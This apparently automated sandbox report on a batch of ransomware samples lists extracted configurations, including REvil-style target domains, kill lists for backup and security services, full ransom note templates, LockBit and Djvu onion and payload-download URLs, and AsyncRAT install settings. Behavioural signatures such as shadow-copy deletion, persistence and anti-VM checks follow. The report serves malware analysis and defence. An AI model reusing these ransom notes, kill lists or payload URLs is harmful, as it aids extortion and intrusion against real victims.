zdrowieszczecin.pl
saboboxtel.uk
sbit.ag
bertbutter.nl
rentingwell.com
eos-horlogerie.com
espaciopolitica.com
adedesign.com
evsynthacademy.org
animalfood-online.de
humanviruses.org
sjtpo.org
trainiumacademy.com
levencovka.ru
lgiwines.com
energosbit-rp.ru
cesep2019.com
pharmeko-group.com
fotoslubna.com
switch-made.com
delegationhub.com
queertube.net
benchbiz.com
xn--80abehgab4ak0ddz.xn--p1ai
betterce.com
janellrardon.com
andermattswisswatches.ch
metroton.ru
subyard.com
astrographic.com
site.markkit.com.br
arabianmice.com
hotjapaneselesbian.com
yourhappyevents.fr
aoyama.ac
hnkns.com
davedavisphotos.com
nepal-pictures.com
buzzneakers.com
apmollerpension.com
crestgood.com
profiz.com
charlottelhanna.com
jandhpest.com
paardcentraal.nl
pixelhealth.net
mslp.org
omnicademy.com
witraz.pl
quitescorting.com
renderbox.ch
iexpert99.com
11.in.ua
xn--billigafrgpatroner-stb.se
broccolisoep.nl
zealcon.ae
sveneulberg.de
noda.com.ua
silverbird.dk
amorbellezaysalud.com
augen-praxisklinik-rostock.de
maryairbnb.wordpress.com
kvetymichalovce.sk
arazi.eus
dr-vita.de
tchernia-conseil.fr
the-cupboard.co.uk
go.labibini.ch
a-zpaperwork.eu
tbalp.co.uk
sarahspics.co.uk
morgansconsult.com
craftron.com
gazelle-du-web.com
the-beauty-guides.com
greenrider.nl
druktemakersheerenveen.nl
donau-guides.eu
axisoflove.org:443
rivermusic.nl
smartworkplaza.com
motocrossplace.co.uk
natturestaurante.com.br
dnqa.co.uk
krishnabrawijaya.com
reygroup.pt
julielusktherapy.com
circuit-diagramz.com
bcabattoirs.org
kryptos72.com
spectamarketingdigital.com.br
spirello.nl
bcmets.info
protoplay.ca
karelinjames.com
eafx.pro
kryddersnapsen.dk
angeleyezstripclub.com
inewsstar.com
transifer.fr
kartuindonesia.com
jakubrybak.com
digitale-elite.de
cuadc.org
arearugcleaningnyc.com
campusescalade.com
muni.pe
sweetz.fr
dayenne-styling.nl
awag-blog.de
pedmanson.com
line-x.co.uk
elitkeramika-shop.com.ua
advesa.com
hospitalitytrainingsolutions.co.uk
jonnyhooley.com
efficiencyconsulting.es
dantreranch.com
fire-space.com
fta-media.com
placermonticello.com
affligemsehondenschool.be
schulz-moelln.de
eurethicsport.eu
alharsunindo.com
logosindustries.com
primemarineengineering.com
basindentistry.com
internestdigital.com
o90.dk
kafkacare.com
mollymccarthydesign.com
belofloripa.be
oro.ae
bookingwheel.com
kuriero.pro
mariannelemenestrel.com
agenceassemble.fr
baptistdistinctives.org
biketruck.de
ilovefullcircle.com
zaczytana.com
licensed-public-adjuster.com
bajova.sk
chatberlin.de
xtensifi.com
fidelitytitleoregon.com
descargandoprogramas.com
laaisterplakky.nl
kombi-dress.com
skyboundnutrition.co.uk
directique.com
collegetennis.info
hinotruckwreckers.com.au
limounie.com
uncensoredhentaigif.com
cotton-avenue.co.il
rossomattonecase.it
cssp-mediation.org
dierenambulancealkmaar.nl
zuerich-umzug.ch
voice2biz.com
skooppi.fi
ufovidmag.com
berdonllp.com
four-ways.com
testitjavertailut.net
veggienessa.com
whoopingcrane.com
atrgroup.it
dentallabor-luenen.de
cmeow.com
tradenavigator.ch
tweedekansenloket.nl
opt4cdi.com
lapponiasafaris.com
ced-elec.com
plbinsurance.com
entdoctor-durban.com
alexwenzel.de
hostastay.com
vitoriaecoturismo.com.br
beauty-traveller.com
airserviceunlimited.com
penumbuhrambutkeiskei.com
xn--80addfr4ahr.dp.ua
techybash.com
rhino-storage.co.uk
atelierkomon.com
animation-pro.co.uk
fridakids.com
activeterroristwarningcompany.com
kerstliedjeszingen.nl
hameghlim.com
domilivefurniture.com
imagine-entertainment.com
airvapourbarrier.com
unboxtherapy.site
alwaysdc.com
saberconcrete.com
baikalflot.ru
parentsandkids.com
auberives-sur-vareze.fr
scotlandsroute66.co.uk
sambaglow.com
advancedeyecare.com
rapid5kloan.org
hotelturbo.de
marmarabasin.com
lsngroupe.com
autoteamlast.de
voetbalhoogeveen.nl
colored-shelves.com
cainlaw-okc.com
leadforensics.com
keuken-prijs.nl
eyedoctordallas.com
brisbaneosteopathic.com.au
mgimalta.com
johnkoen.com
datatri.be
sealgrinderpt.com
monstarrsoccer.com
ruggestar.ch
harleystreetspineclinic.com
christopherhannan.com
olry-cloisons.fr
yuanshenghotel.com
bourchier.org
myplaywin3.com
90nguyentuan.com
ramirezprono.com
makingmillionaires.net
watchsale.biz
concontactodirecto.com
nvisionsigns.com
craftstone.co.nz
bratek-immobilien.de
housesofwa.com
billscars.net
factorywizuk.com
focuskontur.com
designimage.ae
foerderverein-vatterschule.de
dmlcpa.com
solidhosting.nl
grafikstudio-visuell.de
bulyginnikitav.000webhostapp.com
stressreliefadvice.com
dibli.store
letsstopsmoking.co.uk
ncjc.ca
askstaffing.com
livelai.com
1deals.com
topautoinsurers.net
michal-s.co.il
ygallerysalonsoho.com:443
elliemaccreative.wordpress.com
mazift.dk
direitapernambuco.com
perceptdecor.com
mike.matthies.de
littlesaints.academy
albcleaner.fr
beandrivingschool.com.au
thestudio.academy
leatherjees.com
tetameble.pl
ultimatelifesource.com
mac-computer-support-hamburg.de
fotoeditores.com
mesajjongeren.nl
ingresosextras.online
annida.it
bubbalucious.com
explora.nl
paradigmlandscape.com
lassocrm.com
vedsegaard.dk
vapiano.fr
ocduiblog.com
solutionshosting.co.uk
ludoil.it
pansionatblago.ru
bychowo.pl
werkzeugtrolley.net
gsconcretecoatings.com
kickittickets.com
alnectus.com
b3b.ch
midwestschool.org
burg-zelem.de
5thactors.com
k-v-f.de
circlecitydj.com
nbva.co.uk
renehartman.nl
palmenhaus-erfurt.de
jacquesgarcianoto.com
levelseven.be
pxsrl.it
der-stempelking.de
global-migrate.com
adterium.com
happylublog.wordpress.com
racefietsenblog.nl
curtsdiscountguns.com
turing.academy
mindfuelers.com
invela.dk
fbmagazine.ru
ddmgen.com
amelielecompte.wordpress.com
uci-france.fr
so-sage.fr
xn--ziinoapte-6ld.ro
kompresory-opravy.com
docarefoundation.org
floweringsun.org
heimdalbygg.no
andreaskildegaard.dk
nevadaruralhousingstudies.org
electricianul.com
mediahub.co.nz
mieleshopping.it
lisa-poncon.fr
csaballoons.com
internalresults.com
dentalcircle.com
deduktia.fi
dcc-eu.com
eshop.design
alattekniksipil.com
citydogslife.com
interlinkone.com
physio-lang.de
chorusconsulting.net
leijstrom.com
holocine.de
publicompserver.de
m2graph.fr
mrkluttz.com
amyandzac.com
jlwilsonbooks.com
advanced-removals.co.uk
thegetawaycollective.com
jax-interim-and-projectmanagement.com
funworx.de
-
net
true
-
pid
36
-
prc
thunderbird
mydesktopqos
xfssvccon
visio
dbeng50
outlook
oracle
isqlplussvc
tbirdconfig
firefox
ocomm
sqbcoreservice
encsvc
ocautoupds
winword
synctime
excel
onenote
powerpnt
msaccess
sql
steam
mspub
ocssd
mydesktopservice
agntsvc
wordpad
thebat
dbsnmp
infopath
-
ransom_oneliner
All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions
-
ransom_template
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
-
sub
2864
-
svc
veeam
vss
svc$
mepocs
sql
backup
memtas
sophos
Extracted
C:\Program Files\dotnet\Restore-My-Files.txt
lockbit
http://lockbitks2tvnmwk.onion/?A0C155001DD0CB01B3DD0A890028438E
Extracted
djvu
http://ancs.top/ydtftysdtyftysdfsdpen3/get.php
-
extension
.jope
-
offline_id
K72FcnkdIQC15Y6gSOcshlkpUbvUZNl4zrQFK1t1
-
payload_url
http://ancs.top/files/penelop/updatewin1.exe
http://ancs.top/files/penelop/updatewin2.exe
http://ancs.top/files/penelop/updatewin.exe
http://ancs.top/files/penelop/3.exe
http://ancs.top/files/penelop/4.exe
http://ancs.top/files/penelop/5.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-SIiUh1jDFZ Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0218OIWojlj48
Extracted
asyncrat
0.5.3
1990
-
delay
0
-
install
true
-
install_file
MozillaUpdate.exe
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/hSbwYxQ2
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Asyncrat family
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral1/memory/7448-13478-0x0000000000400000-0x0000000000424000-memory.dmp disable_win_def -
Detected Djvu ransomware 1 IoCs
Processes:
resource yara_rule behavioral1/memory/8252-11735-0x0000000000400000-0x000000000055E000-memory.dmp family_djvu -
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Djvu family
-
GandCrab payload 3 IoCs
Processes:
resource yara_rule \??\c:\users\admin\desktop\00381\trojan-ransom.win32.gandcrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe family_gandcrab behavioral1/memory/3620-304-0x0000000000400000-0x0000000000430000-memory.dmp family_gandcrab behavioral1/memory/3620-307-0x0000000002210000-0x0000000002227000-memory.dmp family_gandcrab -
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Gandcrab family
-
GlobeImposter
GlobeImposter is a ransomware first seen in 2017.
-
Globeimposter family
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Lockbit family
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe HelpMe.exe" HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\0lY33hEQY0to3okR\\85Zgtag5XhCV.exe\",explorer.exe" HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Sodinokibi family
-
Sodinokibi/Revil sample 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Crypmod.adhb-b191182918879be7a23e08840a6e92a1c71217aa0454705b472dd249d5f1c464.exe family_sodinokobi -
AgentTesla payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3328-246-0x0000000000400000-0x0000000000452000-memory.dmp family_agenttesla -
Contacts a large (7782) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exe -
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 8664 bcdedit.exe 5560 bcdedit.exe -
Renames multiple (299) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (3387) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Processes:
wbadmin.exepid process 7748 wbadmin.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe -
Processes:
resource yara_rule C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe aspack_v212_v242 C:\$Recycle.Bin\S-1-5-21-2045521122-590294423-3465680274-1000\desktop.ini.exe aspack_v212_v242 -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exeTrojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exeTrojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exeHEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.execmd.exeHEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exey_installer.exeTrojan-Ransom.Win32.Stop.lv-3b2deafb0e27a340ed84d416e18f13f98ae4d685aa98d1ee1ad66f7e6c2d273b.exeHEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation y_installer.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Stop.lv-3b2deafb0e27a340ed84d416e18f13f98ae4d685aa98d1ee1ad66f7e6c2d273b.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exe -
Drops startup file 6 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exeTrojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Soft.lnk HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe -
Executes dropped EXE 34 IoCs
Processes:
HEUR-Trojan-Ransom.MSIL.Agent.gen-4c530892b2c36a9360cca19a35209ce9efb711ad6a77416863b373f5d566325e.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exeHEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exeHEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exeHEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exeHEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exeHEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exeTrojan-Ransom.Win32.Blocker.lckf-2cb4c4a2a358164b88c5aa95c9147115fccfc837d70a42ee46787fbf59b15590.exeTrojan-Ransom.Win32.Blocker.mobk-22bfc2d64bd801bf496a4b8d1172bccfe65a1d837ccdde4b3d8cc6866bb2de50.exeTrojan-Ransom.Win32.Crusis.dil-fee45eff4c43b338decaf3e0e69d263a46fe4cea12965bc1c015ed3aa69ad3ce.exeTrojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exeTrojan-Ransom.Win32.Crypmod.adhb-b191182918879be7a23e08840a6e92a1c71217aa0454705b472dd249d5f1c464.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exeTrojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exeTrojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exeTrojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exeTrojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exeTrojan-Ransom.Win32.Sodin.aak-3cff33197edc918d47d08f44d6ddbdda157337f0ad58288d15746cf72c0e4c57.exeTrojan-Ransom.Win32.Sodin.abd-74d6a5acee6c8836de88c9bea92c3d785d521cdee91abaf272c2a2c81b30c09c.exey_installer.exeTrojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exeTrojan-Ransom.Win32.Sodin.ba-40ce070f8d58d68aedfca96e572f146d5416edbc4103dc8025bca94880e2a103.exeTrojan-Ransom.Win32.Sodin.g-3fdad99a17a6766fe396081f82394f5e2da0142651427da64a5b6e28c9df2fd4.exeTrojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exeTrojan-Ransom.Win32.Stop.lv-3b2deafb0e27a340ed84d416e18f13f98ae4d685aa98d1ee1ad66f7e6c2d273b.exeTrojan-Ransom.Win32.Stop.mr-2afa5929643add75465fb583e519d5f5bd0d61e75b15382aafd6980eadc79a7e.exeHEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exeHEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exeYandexPackSetup.exey_installer.exeHEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exepid process 2164 HEUR-Trojan-Ransom.MSIL.Agent.gen-4c530892b2c36a9360cca19a35209ce9efb711ad6a77416863b373f5d566325e.exe 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe 1292 HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe 1716 HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe 2276 HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exe 552 HEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exe 2936 HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe 4524 HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exe 4520 Trojan-Ransom.Win32.Blocker.lckf-2cb4c4a2a358164b88c5aa95c9147115fccfc837d70a42ee46787fbf59b15590.exe 3656 Trojan-Ransom.Win32.Blocker.mobk-22bfc2d64bd801bf496a4b8d1172bccfe65a1d837ccdde4b3d8cc6866bb2de50.exe 2580 Trojan-Ransom.Win32.Crusis.dil-fee45eff4c43b338decaf3e0e69d263a46fe4cea12965bc1c015ed3aa69ad3ce.exe 5052 Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe 1468 Trojan-Ransom.Win32.Crypmod.adhb-b191182918879be7a23e08840a6e92a1c71217aa0454705b472dd249d5f1c464.exe 4836 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe 2524 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe 3328 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe 4828 Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe 3620 Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 5056 Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe 3136 Trojan-Ransom.Win32.Sodin.aak-3cff33197edc918d47d08f44d6ddbdda157337f0ad58288d15746cf72c0e4c57.exe 2084 Trojan-Ransom.Win32.Sodin.abd-74d6a5acee6c8836de88c9bea92c3d785d521cdee91abaf272c2a2c81b30c09c.exe 4556 y_installer.exe 2156 Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe 3620 Trojan-Ransom.Win32.Sodin.ba-40ce070f8d58d68aedfca96e572f146d5416edbc4103dc8025bca94880e2a103.exe 6192 Trojan-Ransom.Win32.Sodin.g-3fdad99a17a6766fe396081f82394f5e2da0142651427da64a5b6e28c9df2fd4.exe 3628 Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe 8252 Trojan-Ransom.Win32.Stop.lv-3b2deafb0e27a340ed84d416e18f13f98ae4d685aa98d1ee1ad66f7e6c2d273b.exe 10312 Trojan-Ransom.Win32.Stop.mr-2afa5929643add75465fb583e519d5f5bd0d61e75b15382aafd6980eadc79a7e.exe 10908 HEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exe 7448 HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe 5616 YandexPackSetup.exe 12052 y_installer.exe 9252 HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe -
